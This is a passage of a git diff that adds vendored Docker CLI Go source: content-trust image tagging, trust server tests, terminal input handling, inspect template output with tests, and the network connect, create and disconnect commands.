+		tagged, err := reference.WithTag(repoInfo, r.name)
+		if err != nil {
+			return err
+		}
+		trustedRef, err := reference.WithDigest(reference.TrimNamed(repoInfo), r.digest)
+		if err != nil {
+			return err
+		}
+		if err := TagTrusted(ctx, cli, trustedRef, tagged); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+// imagePullPrivileged pulls the image and displays it to the output
+func imagePullPrivileged(ctx context.Context, cli *command.DockerCli, authConfig types.AuthConfig, ref string, requestPrivilege types.RequestPrivilegeFunc, all bool) error {
+
+	encodedAuth, err := command.EncodeAuthToBase64(authConfig)
+	if err != nil {
+		return err
+	}
+	options := types.ImagePullOptions{
+		RegistryAuth:  encodedAuth,
+		PrivilegeFunc: requestPrivilege,
+		All:           all,
+	}
+
+	responseBody, err := cli.Client().ImagePull(ctx, ref, options)
+	if err != nil {
+		return err
+	}
+	defer responseBody.Close()
+
+	return jsonmessage.DisplayJSONMessagesToStream(responseBody, cli.Out(), nil)
+}
+
+// TrustedReference returns the canonical trusted reference for an image reference
+func TrustedReference(ctx context.Context, cli *command.DockerCli, ref reference.NamedTagged, rs registry.Service) (reference.Canonical, error) {
+	var (
+		repoInfo *registry.RepositoryInfo
+		err      error
+	)
+	if rs != nil {
+		repoInfo, err = rs.ResolveRepository(ref)
+	} else {
+		repoInfo, err = registry.ParseRepositoryInfo(ref)
+	}
+	if err != nil {
+		return nil, err
+	}
+
+	// Resolve the Auth config relevant for this server
+	authConfig := command.ResolveAuthConfig(ctx, cli, repoInfo.Index)
+
+	notaryRepo, err := trust.GetNotaryRepository(cli, repoInfo, authConfig, "pull")
+	if err != nil {
+		fmt.Fprintf(cli.Out(), "Error establishing connection to trust repository: %s\n", err)
+		return nil, err
+	}
+
+	t, err := notaryRepo.GetTargetByName(ref.Tag(), trust.ReleasesRole, data.CanonicalTargetsRole)
+	if err != nil {
+		return nil, trust.NotaryError(repoInfo.FullName(), err)
+	}
+	// Only list tags in the top level targets role or the releases delegation role - ignore
+	// all other delegation roles
+	if t.Role != trust.ReleasesRole && t.Role != data.CanonicalTargetsRole {
+		return nil, trust.NotaryError(repoInfo.FullName(), fmt.Errorf("No trust data for %s", ref.Tag()))
+	}
+	r, err := convertTarget(t.Target)
+	if err != nil {
+		return nil, err
+
+	}
+
+	return reference.WithDigest(reference.TrimNamed(ref), r.digest)
+}
+
+func convertTarget(t client.Target) (target, error) {
+	h, ok := t.Hashes["sha256"]
+	if !ok {
+		return target{}, errors.New("no valid hash, expecting sha256")
+	}
+	return target{
+		name:   t.Name,
+		digest: digest.NewDigestFromHex("sha256", hex.EncodeToString(h)),
+		size:   t.Length,
+	}, nil
+}
+
+// TagTrusted tags a trusted ref
+func TagTrusted(ctx context.Context, cli *command.DockerCli, trustedRef reference.Canonical, ref reference.NamedTagged) error {
+	fmt.Fprintf(cli.Out(), "Tagging %s as %s\n", trustedRef.String(), ref.String())
+
+	return cli.Client().ImageTag(ctx, trustedRef.String(), ref.String())
+}
diff --git a/vendor/github.com/docker/docker/cli/command/image/trust_test.go b/vendor/github.com/docker/docker/cli/command/image/trust_test.go
new file mode 100644
index 0000000000..78146465e6
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/image/trust_test.go
@@ -0,0 +1,57 @@
+package image
+
+import (
+	"os"
+	"testing"
+
+	registrytypes "github.com/docker/docker/api/types/registry"
+	"github.com/docker/docker/cli/trust"
+	"github.com/docker/docker/registry"
+)
+
+func unsetENV() {
+	os.Unsetenv("DOCKER_CONTENT_TRUST")
+	os.Unsetenv("DOCKER_CONTENT_TRUST_SERVER")
+}
+
+func TestENVTrustServer(t *testing.T) {
+	defer unsetENV()
+	indexInfo := &registrytypes.IndexInfo{Name: "testserver"}
+	if err := os.Setenv("DOCKER_CONTENT_TRUST_SERVER", "https://notary-test.com:5000"); err != nil {
+		t.Fatal("Failed to set ENV variable")
+	}
+	output, err := trust.Server(indexInfo)
+	expectedStr := "https://notary-test.com:5000"
+	if err != nil || output != expectedStr {
+		t.Fatalf("Expected server to be %s, got %s", expectedStr, output)
+	}
+}
+
+func TestHTTPENVTrustServer(t *testing.T) {
+	defer unsetENV()
+	indexInfo := &registrytypes.IndexInfo{Name: "testserver"}
+	if err := os.Setenv("DOCKER_CONTENT_TRUST_SERVER", "http://notary-test.com:5000"); err != nil {
+		t.Fatal("Failed to set ENV variable")
+	}
+	_, err := trust.Server(indexInfo)
+	if err == nil {
+		t.Fatal("Expected error with invalid scheme")
+	}
+}
+
+func TestOfficialTrustServer(t *testing.T) {
+	indexInfo := &registrytypes.IndexInfo{Name: "testserver", Official: true}
+	output, err := trust.Server(indexInfo)
+	if err != nil || output != registry.NotaryServer {
+		t.Fatalf("Expected server to be %s, got %s", registry.NotaryServer, output)
+	}
+}
+
+func TestNonOfficialTrustServer(t *testing.T) {
+	indexInfo := &registrytypes.IndexInfo{Name: "testserver", Official: false}
+	output, err := trust.Server(indexInfo)
+	expectedStr := "https://" + indexInfo.Name
+	if err != nil || output != expectedStr {
+		t.Fatalf("Expected server to be %s, got %s", expectedStr, output)
+	}
+}
diff --git a/vendor/github.com/docker/docker/cli/command/in.go b/vendor/github.com/docker/docker/cli/command/in.go
new file mode 100644
index 0000000000..7204b7ad04
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/in.go
@@ -0,0 +1,75 @@
+package command
+
+import (
+	"errors"
+	"io"
+	"os"
+	"runtime"
+
+	"github.com/docker/docker/pkg/term"
+)
+
+// InStream is an input stream used by the DockerCli to read user input
+type InStream struct {
+	in         io.ReadCloser
+	fd         uintptr
+	isTerminal bool
+	state      *term.State
+}
+
+func (i *InStream) Read(p []byte) (int, error) {
+	return i.in.Read(p)
+}
+
+// Close implements the Closer interface
+func (i *InStream) Close() error {
+	return i.in.Close()
+}
+
+// FD returns the file descriptor number for this stream
+func (i *InStream) FD() uintptr {
+	return i.fd
+}
+
+// IsTerminal returns true if this stream is connected to a terminal
+func (i *InStream) IsTerminal() bool {
+	return i.isTerminal
+}
+
+// SetRawTerminal sets raw mode on the input terminal
+func (i *InStream) SetRawTerminal() (err error) {
+	if os.Getenv("NORAW") != "" || !i.isTerminal {
+		return nil
+	}
+	i.state, err = term.SetRawTerminal(i.fd)
+	return err
+}
+
+// RestoreTerminal restores normal mode to the terminal
+func (i *InStream) RestoreTerminal() {
+	if i.state != nil {
+		term.RestoreTerminal(i.fd, i.state)
+	}
+}
+
+// CheckTty checks if we are trying to attach to a container tty
+// from a non-tty client input stream, and if so, returns an error.
+func (i *InStream) CheckTty(attachStdin, ttyMode bool) error {
+	// In order to attach to a container tty, input stream for the client must
+	// be a tty itself: redirecting or piping the client standard input is
+	// incompatible with `docker run -t`, `docker exec -t` or `docker attach`.
+	if ttyMode && attachStdin && !i.isTerminal {
+		eText := "the input device is not a TTY"
+		if runtime.GOOS == "windows" {
+			return errors.New(eText + ".  If you are using mintty, try prefixing the command with 'winpty'")
+		}
+		return errors.New(eText)
+	}
+	return nil
+}
+
+// NewInStream returns a new InStream object from a ReadCloser
+func NewInStream(in io.ReadCloser) *InStream {
+	fd, isTerminal := term.GetFdInfo(in)
+	return &InStream{in: in, fd: fd, isTerminal: isTerminal}
+}
diff --git a/vendor/github.com/docker/docker/cli/command/inspect/inspector.go b/vendor/github.com/docker/docker/cli/command/inspect/inspector.go
new file mode 100644
index 0000000000..1d81643fb1
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/inspect/inspector.go
@@ -0,0 +1,195 @@
+package inspect
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io"
+	"text/template"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/utils/templates"
+)
+
+// Inspector defines an interface to implement to process elements
+type Inspector interface {
+	Inspect(typedElement interface{}, rawElement []byte) error
+	Flush() error
+}
+
+// TemplateInspector uses a text template to inspect elements.
+type TemplateInspector struct {
+	outputStream io.Writer
+	buffer       *bytes.Buffer
+	tmpl         *template.Template
+}
+
+// NewTemplateInspector creates a new inspector with a template.
+func NewTemplateInspector(outputStream io.Writer, tmpl *template.Template) Inspector {
+	return &TemplateInspector{
+		outputStream: outputStream,
+		buffer:       new(bytes.Buffer),
+		tmpl:         tmpl,
+	}
+}
+
+// NewTemplateInspectorFromString creates a new TemplateInspector from a string
+// which is compiled into a template.
+func NewTemplateInspectorFromString(out io.Writer, tmplStr string) (Inspector, error) {
+	if tmplStr == "" {
+		return NewIndentedInspector(out), nil
+	}
+
+	tmpl, err := templates.Parse(tmplStr)
+	if err != nil {
+		return nil, fmt.Errorf("Template parsing error: %s", err)
+	}
+	return NewTemplateInspector(out, tmpl), nil
+}
+
+// GetRefFunc is a function which used by Inspect to fetch an object from a
+// reference
+type GetRefFunc func(ref string) (interface{}, []byte, error)
+
+// Inspect fetches objects by reference using GetRefFunc and writes the json
+// representation to the output writer.
+func Inspect(out io.Writer, references []string, tmplStr string, getRef GetRefFunc) error {
+	inspector, err := NewTemplateInspectorFromString(out, tmplStr)
+	if err != nil {
+		return cli.StatusError{StatusCode: 64, Status: err.Error()}
+	}
+
+	var inspectErr error
+	for _, ref := range references {
+		element, raw, err := getRef(ref)
+		if err != nil {
+			inspectErr = err
+			break
+		}
+
+		if err := inspector.Inspect(element, raw); err != nil {
+			inspectErr = err
+			break
+		}
+	}
+
+	if err := inspector.Flush(); err != nil {
+		logrus.Errorf("%s\n", err)
+	}
+
+	if inspectErr != nil {
+		return cli.StatusError{StatusCode: 1, Status: inspectErr.Error()}
+	}
+	return nil
+}
+
+// Inspect executes the inspect template.
+// It decodes the raw element into a map if the initial execution fails.
+// This allows docker cli to parse inspect structs injected with Swarm fields.
+func (i *TemplateInspector) Inspect(typedElement interface{}, rawElement []byte) error {
+	buffer := new(bytes.Buffer)
+	if err := i.tmpl.Execute(buffer, typedElement); err != nil {
+		if rawElement == nil {
+			return fmt.Errorf("Template parsing error: %v", err)
+		}
+		return i.tryRawInspectFallback(rawElement)
+	}
+	i.buffer.Write(buffer.Bytes())
+	i.buffer.WriteByte('\n')
+	return nil
+}
+
+// tryRawInspectFallback executes the inspect template with a raw interface.
+// This allows docker cli to parse inspect structs injected with Swarm fields.
+func (i *TemplateInspector) tryRawInspectFallback(rawElement []byte) error {
+	var raw interface{}
+	buffer := new(bytes.Buffer)
+	rdr := bytes.NewReader(rawElement)
+	dec := json.NewDecoder(rdr)
+
+	if rawErr := dec.Decode(&raw); rawErr != nil {
+		return fmt.Errorf("unable to read inspect data: %v", rawErr)
+	}
+
+	tmplMissingKey := i.tmpl.Option("missingkey=error")
+	if rawErr := tmplMissingKey.Execute(buffer, raw); rawErr != nil {
+		return fmt.Errorf("Template parsing error: %v", rawErr)
+	}
+
+	i.buffer.Write(buffer.Bytes())
+	i.buffer.WriteByte('\n')
+	return nil
+}
+
+// Flush writes the result of inspecting all elements into the output stream.
+func (i *TemplateInspector) Flush() error {
+	if i.buffer.Len() == 0 {
+		_, err := io.WriteString(i.outputStream, "\n")
+		return err
+	}
+	_, err := io.Copy(i.outputStream, i.buffer)
+	return err
+}
+
+// IndentedInspector uses a buffer to stop the indented representation of an element.
+type IndentedInspector struct {
+	outputStream io.Writer
+	elements     []interface{}
+	rawElements  [][]byte
+}
+
+// NewIndentedInspector generates a new IndentedInspector.
+func NewIndentedInspector(outputStream io.Writer) Inspector {
+	return &IndentedInspector{
+		outputStream: outputStream,
+	}
+}
+
+// Inspect writes the raw element with an indented json format.
+func (i *IndentedInspector) Inspect(typedElement interface{}, rawElement []byte) error {
+	if rawElement != nil {
+		i.rawElements = append(i.rawElements, rawElement)
+	} else {
+		i.elements = append(i.elements, typedElement)
+	}
+	return nil
+}
+
+// Flush writes the result of inspecting all elements into the output stream.
+func (i *IndentedInspector) Flush() error {
+	if len(i.elements) == 0 && len(i.rawElements) == 0 {
+		_, err := io.WriteString(i.outputStream, "[]\n")
+		return err
+	}
+
+	var buffer io.Reader
+	if len(i.rawElements) > 0 {
+		bytesBuffer := new(bytes.Buffer)
+		bytesBuffer.WriteString("[")
+		for idx, r := range i.rawElements {
+			bytesBuffer.Write(r)
+			if idx < len(i.rawElements)-1 {
+				bytesBuffer.WriteString(",")
+			}
+		}
+		bytesBuffer.WriteString("]")
+		indented := new(bytes.Buffer)
+		if err := json.Indent(indented, bytesBuffer.Bytes(), "", "    "); err != nil {
+			return err
+		}
+		buffer = indented
+	} else {
+		b, err := json.MarshalIndent(i.elements, "", "    ")
+		if err != nil {
+			return err
+		}
+		buffer = bytes.NewReader(b)
+	}
+
+	if _, err := io.Copy(i.outputStream, buffer); err != nil {
+		return err
+	}
+	_, err := io.WriteString(i.outputStream, "\n")
+	return err
+}
diff --git a/vendor/github.com/docker/docker/cli/command/inspect/inspector_test.go b/vendor/github.com/docker/docker/cli/command/inspect/inspector_test.go
new file mode 100644
index 0000000000..1ce1593ab7
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/inspect/inspector_test.go
@@ -0,0 +1,221 @@
+package inspect
+
+import (
+	"bytes"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/utils/templates"
+)
+
+type testElement struct {
+	DNS string `json:"Dns"`
+}
+
+func TestTemplateInspectorDefault(t *testing.T) {
+	b := new(bytes.Buffer)
+	tmpl, err := templates.Parse("{{.DNS}}")
+	if err != nil {
+		t.Fatal(err)
+	}
+	i := NewTemplateInspector(b, tmpl)
+	if err := i.Inspect(testElement{"0.0.0.0"}, nil); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := i.Flush(); err != nil {
+		t.Fatal(err)
+	}
+	if b.String() != "0.0.0.0\n" {
+		t.Fatalf("Expected `0.0.0.0\\n`, got `%s`", b.String())
+	}
+}
+
+func TestTemplateInspectorEmpty(t *testing.T) {
+	b := new(bytes.Buffer)
+	tmpl, err := templates.Parse("{{.DNS}}")
+	if err != nil {
+		t.Fatal(err)
+	}
+	i := NewTemplateInspector(b, tmpl)
+
+	if err := i.Flush(); err != nil {
+		t.Fatal(err)
+	}
+	if b.String() != "\n" {
+		t.Fatalf("Expected `\\n`, got `%s`", b.String())
+	}
+}
+
+func TestTemplateInspectorTemplateError(t *testing.T) {
+	b := new(bytes.Buffer)
+	tmpl, err := templates.Parse("{{.Foo}}")
+	if err != nil {
+		t.Fatal(err)
+	}
+	i := NewTemplateInspector(b, tmpl)
+
+	err = i.Inspect(testElement{"0.0.0.0"}, nil)
+	if err == nil {
+		t.Fatal("Expected error got nil")
+	}
+
+	if !strings.HasPrefix(err.Error(), "Template parsing error") {
+		t.Fatalf("Expected template error, got %v", err)
+	}
+}
+
+func TestTemplateInspectorRawFallback(t *testing.T) {
+	b := new(bytes.Buffer)
+	tmpl, err := templates.Parse("{{.Dns}}")
+	if err != nil {
+		t.Fatal(err)
+	}
+	i := NewTemplateInspector(b, tmpl)
+	if err := i.Inspect(testElement{"0.0.0.0"}, []byte(`{"Dns": "0.0.0.0"}`)); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := i.Flush(); err != nil {
+		t.Fatal(err)
+	}
+	if b.String() != "0.0.0.0\n" {
+		t.Fatalf("Expected `0.0.0.0\\n`, got `%s`", b.String())
+	}
+}
+
+func TestTemplateInspectorRawFallbackError(t *testing.T) {
+	b := new(bytes.Buffer)
+	tmpl, err := templates.Parse("{{.Dns}}")
+	if err != nil {
+		t.Fatal(err)
+	}
+	i := NewTemplateInspector(b, tmpl)
+	err = i.Inspect(testElement{"0.0.0.0"}, []byte(`{"Foo": "0.0.0.0"}`))
+	if err == nil {
+		t.Fatal("Expected error got nil")
+	}
+
+	if !strings.HasPrefix(err.Error(), "Template parsing error") {
+		t.Fatalf("Expected template error, got %v", err)
+	}
+}
+
+func TestTemplateInspectorMultiple(t *testing.T) {
+	b := new(bytes.Buffer)
+	tmpl, err := templates.Parse("{{.DNS}}")
+	if err != nil {
+		t.Fatal(err)
+	}
+	i := NewTemplateInspector(b, tmpl)
+
+	if err := i.Inspect(testElement{"0.0.0.0"}, nil); err != nil {
+		t.Fatal(err)
+	}
+	if err := i.Inspect(testElement{"1.1.1.1"}, nil); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := i.Flush(); err != nil {
+		t.Fatal(err)
+	}
+	if b.String() != "0.0.0.0\n1.1.1.1\n" {
+		t.Fatalf("Expected `0.0.0.0\\n1.1.1.1\\n`, got `%s`", b.String())
+	}
+}
+
+func TestIndentedInspectorDefault(t *testing.T) {
+	b := new(bytes.Buffer)
+	i := NewIndentedInspector(b)
+	if err := i.Inspect(testElement{"0.0.0.0"}, nil); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := i.Flush(); err != nil {
+		t.Fatal(err)
+	}
+
+	expected := `[
+    {
+        "Dns": "0.0.0.0"
+    }
+]
+`
+	if b.String() != expected {
+		t.Fatalf("Expected `%s`, got `%s`", expected, b.String())
+	}
+}
+
+func TestIndentedInspectorMultiple(t *testing.T) {
+	b := new(bytes.Buffer)
+	i := NewIndentedInspector(b)
+	if err := i.Inspect(testElement{"0.0.0.0"}, nil); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := i.Inspect(testElement{"1.1.1.1"}, nil); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := i.Flush(); err != nil {
+		t.Fatal(err)
+	}
+
+	expected := `[
+    {
+        "Dns": "0.0.0.0"
+    },
+    {
+        "Dns": "1.1.1.1"
+    }
+]
+`
+	if b.String() != expected {
+		t.Fatalf("Expected `%s`, got `%s`", expected, b.String())
+	}
+}
+
+func TestIndentedInspectorEmpty(t *testing.T) {
+	b := new(bytes.Buffer)
+	i := NewIndentedInspector(b)
+
+	if err := i.Flush(); err != nil {
+		t.Fatal(err)
+	}
+
+	expected := "[]\n"
+	if b.String() != expected {
+		t.Fatalf("Expected `%s`, got `%s`", expected, b.String())
+	}
+}
+
+func TestIndentedInspectorRawElements(t *testing.T) {
+	b := new(bytes.Buffer)
+	i := NewIndentedInspector(b)
+	if err := i.Inspect(testElement{"0.0.0.0"}, []byte(`{"Dns": "0.0.0.0", "Node": "0"}`)); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := i.Inspect(testElement{"1.1.1.1"}, []byte(`{"Dns": "1.1.1.1", "Node": "1"}`)); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := i.Flush(); err != nil {
+		t.Fatal(err)
+	}
+
+	expected := `[
+    {
+        "Dns": "0.0.0.0",
+        "Node": "0"
+    },
+    {
+        "Dns": "1.1.1.1",
+        "Node": "1"
+    }
+]
+`
+	if b.String() != expected {
+		t.Fatalf("Expected `%s`, got `%s`", expected, b.String())
+	}
+}
diff --git a/vendor/github.com/docker/docker/cli/command/network/cmd.go b/vendor/github.com/docker/docker/cli/command/network/cmd.go
new file mode 100644
index 0000000000..ab8393cded
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/network/cmd.go
@@ -0,0 +1,28 @@
+package network
+
+import (
+	"github.com/spf13/cobra"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+)
+
+// NewNetworkCommand returns a cobra command for `network` subcommands
+func NewNetworkCommand(dockerCli *command.DockerCli) *cobra.Command {
+	cmd := &cobra.Command{
+		Use:   "network",
+		Short: "Manage networks",
+		Args:  cli.NoArgs,
+		RunE:  dockerCli.ShowHelp,
+	}
+	cmd.AddCommand(
+		newConnectCommand(dockerCli),
+		newCreateCommand(dockerCli),
+		newDisconnectCommand(dockerCli),
+		newInspectCommand(dockerCli),
+		newListCommand(dockerCli),
+		newRemoveCommand(dockerCli),
+		NewPruneCommand(dockerCli),
+	)
+	return cmd
+}
diff --git a/vendor/github.com/docker/docker/cli/command/network/connect.go b/vendor/github.com/docker/docker/cli/command/network/connect.go
new file mode 100644
index 0000000000..c4b676e5f1
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/network/connect.go
@@ -0,0 +1,64 @@
+package network
+
+import (
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/opts"
+	runconfigopts "github.com/docker/docker/runconfig/opts"
+	"github.com/spf13/cobra"
+)
+
+type connectOptions struct {
+	network      string
+	container    string
+	ipaddress    string
+	ipv6address  string
+	links        opts.ListOpts
+	aliases      []string
+	linklocalips []string
+}
+
+func newConnectCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := connectOptions{
+		links: opts.NewListOpts(runconfigopts.ValidateLink),
+	}
+
+	cmd := &cobra.Command{
+		Use:   "connect [OPTIONS] NETWORK CONTAINER",
+		Short: "Connect a container to a network",
+		Args:  cli.ExactArgs(2),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.network = args[0]
+			opts.container = args[1]
+			return runConnect(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.StringVar(&opts.ipaddress, "ip", "", "IP Address")
+	flags.StringVar(&opts.ipv6address, "ip6", "", "IPv6 Address")
+	flags.Var(&opts.links, "link", "Add link to another container")
+	flags.StringSliceVar(&opts.aliases, "alias", []string{}, "Add network-scoped alias for the container")
+	flags.StringSliceVar(&opts.linklocalips, "link-local-ip", []string{}, "Add a link-local address for the container")
+
+	return cmd
+}
+
+func runConnect(dockerCli *command.DockerCli, opts connectOptions) error {
+	client := dockerCli.Client()
+
+	epConfig := &network.EndpointSettings{
+		IPAMConfig: &network.EndpointIPAMConfig{
+			IPv4Address:  opts.ipaddress,
+			IPv6Address:  opts.ipv6address,
+			LinkLocalIPs: opts.linklocalips,
+		},
+		Links:   opts.links.GetAll(),
+		Aliases: opts.aliases,
+	}
+
+	return client.NetworkConnect(context.Background(), opts.network, opts.container, epConfig)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/network/create.go b/vendor/github.com/docker/docker/cli/command/network/create.go
new file mode 100644
index 0000000000..abc494e1e0
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/network/create.go
@@ -0,0 +1,226 @@
+package network
+
+import (
+	"fmt"
+	"net"
+	"strings"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/opts"
+	runconfigopts "github.com/docker/docker/runconfig/opts"
+	"github.com/spf13/cobra"
+)
+
+type createOptions struct {
+	name       string
+	driver     string
+	driverOpts opts.MapOpts
+	labels     opts.ListOpts
+	internal   bool
+	ipv6       bool
+	attachable bool
+
+	ipamDriver  string
+	ipamSubnet  []string
+	ipamIPRange []string
+	ipamGateway []string
+	ipamAux     opts.MapOpts
+	ipamOpt     opts.MapOpts
+}
+
+func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := createOptions{
+		driverOpts: *opts.NewMapOpts(nil, nil),
+		labels:     opts.NewListOpts(runconfigopts.ValidateEnv),
+		ipamAux:    *opts.NewMapOpts(nil, nil),
+		ipamOpt:    *opts.NewMapOpts(nil, nil),
+	}
+
+	cmd := &cobra.Command{
+		Use:   "create [OPTIONS] NETWORK",
+		Short: "Create a network",
+		Args:  cli.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.name = args[0]
+			return runCreate(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.StringVarP(&opts.driver, "driver", "d", "bridge", "Driver to manage the Network")
+	flags.VarP(&opts.driverOpts, "opt", "o", "Set driver specific options")
+	flags.Var(&opts.labels, "label", "Set metadata on a network")
+	flags.BoolVar(&opts.internal, "internal", false, "Restrict external access to the network")
+	flags.BoolVar(&opts.ipv6, "ipv6", false, "Enable IPv6 networking")
+	flags.BoolVar(&opts.attachable, "attachable", false, "Enable manual container attachment")
+
+	flags.StringVar(&opts.ipamDriver, "ipam-driver", "default", "IP Address Management Driver")
+	flags.StringSliceVar(&opts.ipamSubnet, "subnet", []string{}, "Subnet in CIDR format that represents a network segment")
+	flags.StringSliceVar(&opts.ipamIPRange, "ip-range", []string{}, "Allocate container ip from a sub-range")
+	flags.StringSliceVar(&opts.ipamGateway, "gateway", []string{}, "IPv4 or IPv6 Gateway for the master subnet")
+
+	flags.Var(&opts.ipamAux, "aux-address", "Auxiliary IPv4 or IPv6 addresses used by Network driver")
+	flags.Var(&opts.ipamOpt, "ipam-opt", "Set IPAM driver specific options")
+
+	return cmd
+}
+
+func runCreate(dockerCli *command.DockerCli, opts createOptions) error {
+	client := dockerCli.Client()
+
+	ipamCfg, err := consolidateIpam(opts.ipamSubnet, opts.ipamIPRange, opts.ipamGateway, opts.ipamAux.GetAll())
+	if err != nil {
+		return err
+	}
+
+	// Construct network create request body
+	nc := types.NetworkCreate{
+		Driver:  opts.driver,
+		Options: opts.driverOpts.GetAll(),
+		IPAM: &network.IPAM{
+			Driver:  opts.ipamDriver,
+			Config:  ipamCfg,
+			Options: opts.ipamOpt.GetAll(),
+		},
+		CheckDuplicate: true,
+		Internal:       opts.internal,
+		EnableIPv6:     opts.ipv6,
+		Attachable:     opts.attachable,
+		Labels:         runconfigopts.ConvertKVStringsToMap(opts.labels.GetAll()),
+	}
+
+	resp, err := client.NetworkCreate(context.Background(), opts.name, nc)
+	if err != nil {
+		return err
+	}
+	fmt.Fprintf(dockerCli.Out(), "%s\n", resp.ID)
+	return nil
+}
+
+// Consolidates the ipam configuration as a group from different related configurations
+// user can configure network with multiple non-overlapping subnets and hence it is
+// possible to correlate the various related parameters and consolidate them.
+// consoidateIpam consolidates subnets, ip-ranges, gateways and auxiliary addresses into
+// structured ipam data.
+func consolidateIpam(subnets, ranges, gateways []string, auxaddrs map[string]string) ([]network.IPAMConfig, error) {
+	if len(subnets) < len(ranges) || len(subnets) < len(gateways) {
+		return nil, fmt.Errorf("every ip-range or gateway must have a corresponding subnet")
+	}
+	iData := map[string]*network.IPAMConfig{}
+
+	// Populate non-overlapping subnets into consolidation map
+	for _, s := range subnets {
+		for k := range iData {
+			ok1, err := subnetMatches(s, k)
+			if err != nil {
+				return nil, err
+			}
+			ok2, err := subnetMatches(k, s)
+			if err != nil {
+				return nil, err
+			}
+			if ok1 || ok2 {
+				return nil, fmt.Errorf("multiple overlapping subnet configuration is not supported")
+			}
+		}
+		iData[s] = &network.IPAMConfig{Subnet: s, AuxAddress: map[string]string{}}
+	}
+
+	// Validate and add valid ip ranges
+	for _, r := range ranges {
+		match := false
+		for _, s := range subnets {
+			ok, err := subnetMatches(s, r)
+			if err != nil {
+				return nil, err
+			}
+			if !ok {
+				continue
+			}
+			if iData[s].IPRange != "" {
+				return nil, fmt.Errorf("cannot configure multiple ranges (%s, %s) on the same subnet (%s)", r, iData[s].IPRange, s)
+			}
+			d := iData[s]
+			d.IPRange = r
+			match = true
+		}
+		if !match {
+			return nil, fmt.Errorf("no matching subnet for range %s", r)
+		}
+	}
+
+	// Validate and add valid gateways
+	for _, g := range gateways {
+		match := false
+		for _, s := range subnets {
+			ok, err := subnetMatches(s, g)
+			if err != nil {
+				return nil, err
+			}
+			if !ok {
+				continue
+			}
+			if iData[s].Gateway != "" {
+				return nil, fmt.Errorf("cannot configure multiple gateways (%s, %s) for the same subnet (%s)", g, iData[s].Gateway, s)
+			}
+			d := iData[s]
+			d.Gateway = g
+			match = true
+		}
+		if !match {
+			return nil, fmt.Errorf("no matching subnet for gateway %s", g)
+		}
+	}
+
+	// Validate and add aux-addresses
+	for key, aa := range auxaddrs {
+		match := false
+		for _, s := range subnets {
+			ok, err := subnetMatches(s, aa)
+			if err != nil {
+				return nil, err
+			}
+			if !ok {
+				continue
+			}
+			iData[s].AuxAddress[key] = aa
+			match = true
+		}
+		if !match {
+			return nil, fmt.Errorf("no matching subnet for aux-address %s", aa)
+		}
+	}
+
+	idl := []network.IPAMConfig{}
+	for _, v := range iData {
+		idl = append(idl, *v)
+	}
+	return idl, nil
+}
+
+func subnetMatches(subnet, data string) (bool, error) {
+	var (
+		ip net.IP
+	)
+
+	_, s, err := net.ParseCIDR(subnet)
+	if err != nil {
+		return false, fmt.Errorf("Invalid subnet %s : %v", s, err)
+	}
+
+	if strings.Contains(data, "/") {
+		ip, _, err = net.ParseCIDR(data)
+		if err != nil {
+			return false, fmt.Errorf("Invalid cidr %s : %v", data, err)
+		}
+	} else {
+		ip = net.ParseIP(data)
+	}
+
+	return s.Contains(ip), nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/network/disconnect.go b/vendor/github.com/docker/docker/cli/command/network/disconnect.go
new file mode 100644
index 0000000000..c9d9c14a13
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/network/disconnect.go
@@ -0,0 +1,41 @@
+package network
+
+import (
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+type disconnectOptions struct {
+	network   string
+	container string
+	force     bool
+}
+
+func newDisconnectCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := disconnectOptions{}
+
+	cmd := &cobra.Command{
+		Use:   "disconnect [OPTIONS] NETWORK CONTAINER",
+		Short: "Disconnect a container from a network",
+		Args:  cli.ExactArgs(2),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.network = args[0]
+			opts.container = args[1]
+			return runDisconnect(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.BoolVarP(&opts.force, "force", "f", false, "Force the container to disconnect from a network")
+
+	return cmd
+}
+
+func runDisconnect(dockerCli *command.DockerCli, opts disconnectOptions) error {
+	client := dockerCli.Client()
+
+	return client.NetworkDisconnect(context.Background(), opts.network, opts.container, opts.force)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/network/inspect.go b/vendor/github.com/docker/docker/cli/command/network/inspect.go
new file mode 100644
index 0000000000..1a86855f71
